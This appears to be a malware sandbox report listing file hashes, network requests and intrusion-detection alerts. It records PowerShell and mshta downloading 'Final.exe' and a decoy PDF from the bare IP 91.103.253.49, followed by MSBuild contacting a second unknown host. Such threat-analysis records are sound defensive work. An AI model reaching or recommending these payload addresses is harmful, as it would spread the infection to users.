MD5: CDA728256ECB3980324037A6C70E311C
SHA256: 2EE6CC88F59F5143ABCF0AC66466299048F837C7C150C89073BC80E7FB81F871

PID: 7896 | Process: Acrobat.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.1.20093.6 2025-03-24 21-33-42-732.log
MD5: 460C6041966002D8384A18C895A65EB0
SHA256: C83EC6E8FB3EC62481289C033238C1D9B08DB8076EAAD304099FD7A7F594F1B9

PID: 8000 | Process: AcroCEF.exe | Type: text
Filename: C:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old~RF10fb0b.TMP
MD5: ED7D8AAE48211E2BFAF557130572C62A
SHA256: A5CF8D8ADC86DCA357396AF7E3A24A116072D5C1E5552EEB76601AE2673DED6E

PID: 8000 | Process: AcroCEF.exe | Type: text
Filename: C:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old
MD5: 2EF1F7C0782D1A46974286420D24F629
SHA256: D3A9BB7E09E1F4B0C41FF7808E930DDACF5DB3BACD98ECCF5BC7DB4863D1FCF5

PID: 7896 | Process: Acrobat.exe | Type: binary
Filename: C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
MD5: A825E8699BDD21021A350BCDD1A32C47
SHA256: BBD3F26BFF5A6A35BA8F5023787D4D96267600F0229904B6627DE1AA94C6F9E7

PID: 8000 | Process: AcroCEF.exe | Type: text
Filename: C:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF10fa02.TMP
MD5: D012E5B4EB91B61F6E8AE2F8EC3C623E
SHA256: 1BDA750084F20306722008016420E1912BA608CA8EFB9C661F7E7EFCF5E89673
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
209
TCP/UDP connections
170
DNS requests
134
Threats
38

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
- | - | GET | 200 | 91.103.253.49:80 | http://91.103.253.49/CarrierAgreement | unknown | - | - | unknown
7604 | powershell.exe | GET | 200 | 91.103.253.49:80 | http://91.103.253.49/1.pdf | unknown | - | - | unknown
7604 | powershell.exe | GET | 200 | 91.103.253.49:80 | http://91.103.253.49/Final.exe | unknown | - | - | unknown
- | - | OPTIONS | 204 | 3.219.243.226:443 | https://p13n.adobe.io/psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&adcProductLanguage=en-us&adcVersion=23.1.20093&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RU&adcXAPIClientID=api_reader_desktop_win_23.1.20093&encodingScheme=BASE_64 | unknown | - | - | -
- | - | HEAD | 200 | 23.50.131.78:443 | https://uci.cdn.office.net/mirrored/smartlookup/current/scripts/microsoft.office.smartlookup.ssr.js | unknown | - | - | -
- | - | HEAD | 200 | 23.50.131.89:443 | https://uci.cdn.office.net/mirrored/smartlookup/current/version.json | unknown | - | - | -
- | - | GET | 200 | 23.35.236.137:443 | https://geo2.adobe.com/ | unknown | text | 48 b | whitelisted
- | - | GET | 200 | 52.111.236.4:443 | https://messaging.lifecycle.office.com/getcustommessage16?app=6&ui=en-US&src=BizBar&messagetype=BizBar&hwid=04111-083-043729&ver=16.0.16026&lc=en-US&platform=10%3A0%3A19045%3A2%3A0%3A0%3A256%3A1%3A&productid=%7B1717C1E0-47D3-4899-A6D3-1022DB7415E0%7D%3A00411-10830-43729-AA720%3AOffice%2019%2C%20Office19Professional2019R_Retail%20edition&clientsessionid=%7B5D8F25AF-E550-40ED-B816-0426C6DDD0AB%7D&datapropertybag=%7B%22Audience%22%3A%22Production%22%2C%22AudienceGroup%22%3A%22Production%22%2C%22AudienceChannel%22%3A%22CC%22%2C%22Flight%22%3A%22ofsh6c2b1tla1a31%2Cofcrui4yvdulbf31%2Cofhpex3jznepoo31%2Cofpioygfqmufst31%22%7D | unknown | text | 542 b | whitelisted
- | - | GET | 200 | 23.50.131.78:443 | https://uci.cdn.office.net/mirrored/smartlookup/current/scripts/microsoft.office.smartlookup.ssr.js | unknown | binary | 2.50 Mb | whitelisted
- | - | GET | 200 | 52.6.155.20:443 | https://p13n.adobe.io/psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&adcProductLanguage=en-us&adcVersion=23.1.20093&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RU&adcXAPIClientID=api_reader_desktop_win_23.1.20093&encodingScheme=BASE_64 | unknown | binary | 187 b | whitelisted
("-" marks a column the export leaves empty for that row.)

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
- | - | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
7496 | mshta.exe | 91.103.253.49:80 | - | Leaseweb Deutschland GmbH | DE | unknown
7604 | powershell.exe | 91.103.253.49:80 | - | Leaseweb Deutschland GmbH | DE | unknown
8184 | AcroCEF.exe | 95.100.184.205:443 | geo2.adobe.com | AKAMAI-AS | FR | whitelisted
8184 | AcroCEF.exe | 50.16.47.176:443 | p13n.adobe.io | AMAZON-AES | US | whitelisted
7436 | OUTLOOK.EXE | 52.123.129.14:443 | ecs.office.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
6592 | MSBuild.exe | 212.18.104.245:443 | - | Anas Firas Flayyih Al-Qaysi | GB | unknown
8184 | AcroCEF.exe | 2.23.244.205:443 | armmf.adobe.com | Ooredoo Q.S.C. | QA | whitelisted
("-" marks a column the export leaves empty for that row.)

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
google.com
  • 142.250.186.110
whitelisted
geo2.adobe.com
  • 95.100.184.205
whitelisted
p13n.adobe.io
  • 50.16.47.176
  • 54.224.241.105
  • 34.237.241.83
  • 18.213.11.84
whitelisted
ecs.office.com
  • 52.123.129.14
  • 52.123.128.14
whitelisted
armmf.adobe.com
  • 2.23.244.205
whitelisted
omex.cdn.office.net
  • 2.22.242.226
  • 2.22.242.104
  • 2.22.242.97
  • 2.22.242.130
whitelisted
acroipm2.adobe.com
  • 2.22.242.11
  • 2.22.242.123
whitelisted
messaging.lifecycle.office.com
  • 52.111.236.4
whitelisted
self.events.data.microsoft.com
  • 40.79.141.153
whitelisted

Threats

PID | Process | Class | Message
7496 | mshta.exe | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP
7496 | mshta.exe | Misc activity | ET INFO Packed Executable Download
7496 | mshta.exe | Potentially Bad Traffic | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
7604 | powershell.exe | Potentially Bad Traffic | ET INFO Dotted Quad Host PDF Request
7604 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host
6592 | MSBuild.exe | Generic Protocol Command Decode | SURICATA HTTP request header invalid
6592 | MSBuild.exe | Generic Protocol Command Decode | SURICATA HTTP request field missing colon
6592 | MSBuild.exe | Generic Protocol Command Decode | SURICATA HTTP METHOD terminated by non-compliant character
6592 | MSBuild.exe | Generic Protocol Command Decode | SURICATA HTTP URI terminated by non-compliant character
- | - | Generic Protocol Command Decode | SURICATA HTTP request field missing colon
("-" marks a column the export leaves empty for that row.)
No debug info